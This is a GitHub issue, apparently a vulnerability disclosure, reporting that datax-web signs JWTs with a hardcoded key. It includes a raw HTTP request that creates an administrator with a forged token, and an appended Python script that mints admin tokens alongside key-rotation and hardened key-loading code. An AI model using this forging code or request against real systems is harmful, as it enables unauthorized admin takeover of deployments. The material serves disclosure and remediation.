WeiYe-Jing / datax-web

DataX integration with a visual UI: pick a data source and generate a data synchronization task with one click. Supports RDBMS, Hive, HBase, ClickHouse, MongoDB and other data sources, batch creation of RDBMS synchronization tasks, and integration with an open-source scheduler; supports distributed and incremental synchronization, real-time viewing of run logs, executor resource monitoring, KILL of running processes, encryption of data source credentials, and more.
https://segmentfault.com/u/weiye_jing/articles
MIT License
5.64k stars 2.17k forks

[BUG] Hardcoded key: obtain administrator rights #662

Open sh1rosec opened 6 months ago

sh1rosec commented 6 months ago

A fixed key is used to generate the token, so an administrator token can be forged to log into the backend. https://github.com/WeiYe-Jing/datax-web/blob/master/datax-admin/src/main/java/com/wugui/datax/admin/util/JwtTokenUtils.java (screenshot)

Calling the method to generate a token (screenshot)

Add an administrator:

```http
POST /api/user/add HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: en-GB,zh-CN;q=0.9,zh;q=0.7,zh-TW;q=0.6,zh-HK;q=0.4,en-US;q=0.3,en;q=0.1
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiIxLGFkbWluIiwiaXNzIjoiYWRtaW4iLCJleHAiOjE2ODcwNzcyNzEsImlhdCI6MTY4NjQ3MjQ3MSwicm9sIjoiYWRtaW4ifQ.eSujj0qZbJGU1Ou7xnOP4SW6S2Ys5SE9G0Vnus9Y4vSZNOA9ylpWfPue5hqDU5NzZNcJU49SCtIwIiKMhReQtg
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 92

{"role":"ROLE_ADMIN","username":"test","userEmail":"","password":"123456","permission":""}
```
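The mechanics behind the report, as an added example written for this page rather than code from datax-web: the posted token is decoded (without verification) to show its claim layout, an admin token with the same layout is minted under a key that stands in for the constant in JwtTokenUtils.java, and a verifier shows that the forged token is accepted as long as that key is in use and rejected once the key is rotated. The hardened key loader refuses to run with a missing, short, or known-leaked secret. The key bytes, the `DATAX_JWT_SECRET` variable name and the sample timestamps are assumptions; the real key appears on the page only in a screenshot.

```python
"""HS512 JWT forgery with a hardcoded key, and the hardened key handling.

Added example, not datax-web code. LEAKED_KEY is a placeholder (assumption):
the issue shows the real constant only in a screenshot.
"""
import base64
import hashlib
import hmac
import json
import os
import secrets
import time
from typing import Mapping, Optional

# Stand-in for the compiled-in secret in JwtTokenUtils.java (placeholder, assumption).
LEAKED_KEY = b"placeholder-hardcoded-secret-from-JwtTokenUtils"

# Token taken from the request posted in the issue (payload decoded below, unverified).
POSTED_TOKEN = (
    "eyJhbGciOiJIUzUxMiJ9."
    "eyJzdWIiOiIxLGFkbWluIiwiaXNzIjoiYWRtaW4iLCJleHAiOjE2ODcwNzcyNzEsImlhdCI6MTY4NjQ3MjQ3MSwicm9sIjoiYWRtaW4ifQ."
    "eSujj0qZbJGU1Ou7xnOP4SW6S2Ys5SE9G0Vnus9Y4vSZNOA9ylpWfPue5hqDU5NzZNcJU49SCtIwIiKMhReQtg"
)


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs512_sign(claims: dict, key: bytes) -> str:
    """Build a compact JWS (alg=HS512) over the claims: anyone with `key` can do this."""
    header = _b64url(json.dumps({"alg": "HS512"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha512).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def forge_admin_token(key: bytes, user_id: int = 1, username: str = "admin",
                      now: Optional[int] = None) -> str:
    """Mint an admin token with the claim layout seen in the posted token:
    sub="<id>,<name>", iss=<name>, rol="admin", exp - iat = 604800 s (7 days)."""
    now = int(time.time()) if now is None else now
    claims = {"sub": f"{user_id},{username}", "iss": username,
              "exp": now + 7 * 24 * 3600, "iat": now, "rol": "admin"}
    return hs512_sign(claims, key)


def decode_unverified(token: str) -> dict:
    """Read the payload only; never use this for an authorisation decision."""
    return json.loads(_unb64url(token.split(".")[1]))


def verify_hs512(token: str, key: bytes, now: Optional[int] = None) -> Optional[dict]:
    """Return the claims if algorithm, signature and expiry all check out, else None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    try:
        header = json.loads(_unb64url(parts[0]))
        signature = _unb64url(parts[2])
        # Pin the algorithm server-side; the token must not get to choose it.
        if header.get("alg") != "HS512":
            return None
        expected = hmac.new(key, f"{parts[0]}.{parts[1]}".encode(), hashlib.sha512).digest()
        if not hmac.compare_digest(expected, signature):
            return None
        claims = json.loads(_unb64url(parts[1]))
    except ValueError:          # bad base64 or bad JSON
        return None
    now = int(time.time()) if now is None else now
    if not isinstance(claims.get("exp"), int) or claims["exp"] <= now:
        return None
    return claims


def load_signing_key(env: Mapping[str, str] = os.environ,
                     var: str = "DATAX_JWT_SECRET") -> bytes:
    """Hardened replacement for a compiled-in constant (variable name is an assumption).
    Refuses to start with no key, a short key, or the leaked value, so a deployment
    cannot silently keep using the secret that is public in the repository."""
    key = env.get(var, "").encode()
    if len(key) < 32:
        raise RuntimeError(f"{var} must hold at least 32 bytes of random data")
    if hmac.compare_digest(key, LEAKED_KEY):
        raise RuntimeError(f"{var} is the leaked hardcoded key; rotate it")
    return key


if __name__ == "__main__":
    print("posted token claims:", decode_unverified(POSTED_TOKEN))
    forged = forge_admin_token(LEAKED_KEY)
    print("forged token accepted under leaked key:", verify_hs512(forged, LEAKED_KEY) is not None)
    print("forged token accepted after rotation:", verify_hs512(forged, secrets.token_bytes(64)) is not None)
```

Rotating the key invalidates every token minted with the old one, which is the intended effect here: tokens forged from the repository constant stop working the moment the deployment stops using it. Generate the replacement with `secrets.token_bytes(64)` (or the equivalent on the deployment host) and supply it through configuration, never through source.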